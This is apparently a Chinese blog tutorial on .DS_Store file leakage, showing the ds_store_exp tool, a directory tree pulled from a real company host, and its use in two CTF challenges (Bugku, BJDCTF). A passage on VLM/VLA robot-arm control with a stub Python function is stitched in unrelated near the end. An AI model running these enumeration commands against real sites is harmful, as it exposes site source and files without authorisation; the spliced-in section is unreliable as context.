DS_Store文件泄漏

在这里插入图片描述

什么DS_Store

.DS_Store是Mac OS保存文件夹的自定义属性的隐藏文件,如文件的图标位置或背景色,相当于Windows的desktop.ini。 其删除以后的副作用就是这些信息的失去。

和别人交换文件(或你做的网页需要上传的时候)应该把 .DS_Store 文件删除比较妥当,因为里面包含了一些你不一定希望别人看见的信息。尤其是网站,通过 .DS_Store 可以知道这个目录里面所有文件的清单,很多时候这是一个不希望出现的问题。

DS_Store文件泄漏

.DS_Store是Mac下Finder用来保存如何展示 文件/文件夹 的数据文件,每个文件夹下对应一个。由于开发/设计人员在发布代码时未删除文件夹中隐藏的.DS_store,可能造成文件目录结构泄漏、源代码文件等敏感信息的泄露。

利用工具——ds_store_exp

源码地址:https://github.com/lijiejie/ds_store_exp

这是一个 .DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地(生成一个该,目标网站的一个源码文件夹)。其运行需要python2环境。
从github上下载工具到本地后,先安装需要的相关库文件:

pip install -r requirements.txt

使用:

python ds_store_exp.py http://www.example.com/.DS_Store

Example:

ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store

hd.zj.qq.com/
└── themes
    └── galaxyw
        ├── app
        │   └── css
        │       └── style.min.css
        ├── cityData.min.js
        ├── images
        │   └── img
        │       ├── bg-hd.png
        │       ├── bg-item-activity.png
        │       ├── bg-masker-pop.png
        │       ├── btn-bm.png
        │       ├── btn-login-qq.png
        │       ├── btn-login-wx.png
        │       ├── ico-add-pic.png
        │       ├── ico-address.png
        │       ├── ico-bm.png
        │       ├── ico-duration-time.png
        │       ├── ico-pop-close.png
        │       ├── ico-right-top-delete.png
        │       ├── page-login-hd.png
        │       ├── pic-masker.png
        │       └── ticket-selected.png
        └── member
            ├── assets
            │   ├── css
            │   │   ├── ace-reset.css
            │   │   └── antd.css
            │   └── lib
            │       ├── cityData.min.js
            │       └── ueditor
            │           ├── index.html
            │           ├── lang
            │           │   └── zh-cn
            │           │       ├── images
            │           │       │   ├── copy.png
            │           │       │   ├── localimage.png
            │           │       │   ├── music.png
            │           │       │   └── upload.png
            │           │       └── zh-cn.js
            │           ├── php
            │           │   ├── action_crawler.php
            │           │   ├── action_list.php
            │           │   ├── action_upload.php
            │           │   ├── config.json
            │           │   ├── controller.php
            │           │   └── Uploader.class.php
            │           ├── ueditor.all.js
            │           ├── ueditor.all.min.js
            │           ├── ueditor.config.js
            │           ├── ueditor.parse.js
            │           └── ueditor.parse.min.js
            └── static
                ├── css
                │   └── page.css
                ├── img
                │   ├── bg-table-title.png
                │   ├── bg-tab-say.png
                │   ├── ico-black-disabled.png
                │   ├── ico-black-enabled.png
                │   ├── ico-coorption-person.png
                │   ├── ico-miss-person.png
                │   ├── ico-mr-person.png
                │   ├── ico-white-disabled.png
                │   └── ico-white-enabled.png
                └── scripts
                    ├── js
                    └── lib
                        └── jquery.min.js

21 directories, 48 files

实例:

bugku-sql注入2

此题本为sql账户入题目,但他同时也有DS_Store文件泄漏漏洞。
在这里插入图片描述
通过dirsearch扫描发现.DS_Store文件泄露
在这里插入图片描述
使用利用工具——ds_store_exp查看.DS_Store文件

python ds_store_exp.py http://123.206.87.240:8007/web2/.DS_Store

在这里插入图片描述
发现flag文件,进入已下载下来的源码文件:
在这里插入图片描述

[BJDCTF 2nd]假猪套天下第一

进去之后:在这里插入图片描述
可以直接用sql注入的万能密码登录进去,但是之后再无其他线索。我们只能用dirsearch扫描一下目录,发现/.DS_Store文件,
在这里插入图片描述
那就可以断定是DS_Store文件泄露了。
之后,上我们的利用工具——ds_store_exp:

python ds_store_exp.py http://node3.buuoj.cn:28294/.DS_Store

在这里插入图片描述
列出目录发现了L0g1n.php。访问它:
在这里插入图片描述
之后解题过程见:https://blog.csdn.net/qq_45521281/article/details/105775452

更多源码泄露:https://blog.csdn.net/qq_36869808/article/details/88895109

### VLM 和 VLA 中的机械臂技术参数 在涉及视觉-语言模型(VLM)和视觉-语言-动作模型(VLA)的应用中,机械臂的技术参数设计至关重要。这类系统通常依赖于高精度传感器、强大的计算资源以及高效的控制系统。 #### 高级操控策略 一个基于扩散的高级操控策略被应用于机械臂操作中[^4]。此策略接收来自腕部安装摄像头的实时视频流作为输入数据源,并据此生成一系列末端执行器的姿态目标。这些姿态目标是在摄像机坐标系内定义的,从而使得机械臂能够精确地模仿人类手眼协调完成复杂任务的能力。 #### 动作预测模块 为了使VLM具备产生实际物理世界中的运动指令能力,在其架构之后连接了一个特别定制的动作预测组件(action expert)[^2]。这一部件利用注意力机制与基础VLM各层之间建立联系,动态调整自身权重以适应不同情境下的需求变化。最终输出的是连续形式的动作序列而非离散化的令牌表示法,这有助于提高响应速度并减少延迟时间。 ### 应用场景 当涉及到具体应用场景时,VLA更侧重于结合视觉和语言信息来进行特定的任务执行,尤其是在机器人控制领域有着广泛用途: - **工业自动化**: 自动装配线上的零件抓取放置; 物料搬运; - **医疗辅助**: 手术室内的器械传递;康复治疗过程中的协助; - **家庭服务型机器人**: 日常生活物品整理收纳;清洁维护工作等. ### 控制系统结构 整个系统的运作离不开一套完善的控制系统支持: 1. **感知单元** - 使用RGB-D相机或其他类型的成像设备获取环境图像。 2. **处理核心** - 基于GPU加速平台运行深度神经网络算法实现对物体识别分类定位等功能。 3. **决策制定者** - 结合自然语言理解和规划逻辑确定下一步行动计划。 4. **执行机构** - 由多个自由度组成的多关节机械臂负责实施预定的操作命令。 ```python import numpy as np def control_system(input_image, command_text): perception_output = process_perception(input_image) decision = make_decision(perception_output, command_text) action_sequence = generate_action(decision) execute_actions(action_sequence) control_system(np.random.rand(240, 320), "Pick up the red block.") ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值